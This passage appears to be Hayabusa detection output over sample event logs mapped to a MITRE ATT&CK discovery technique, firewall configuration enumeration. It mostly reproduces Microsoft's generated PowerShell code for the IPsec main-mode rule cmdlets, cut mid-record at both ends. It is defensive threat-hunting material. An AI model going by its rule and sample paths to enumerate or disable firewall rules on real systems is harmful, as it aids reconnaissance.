[Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = 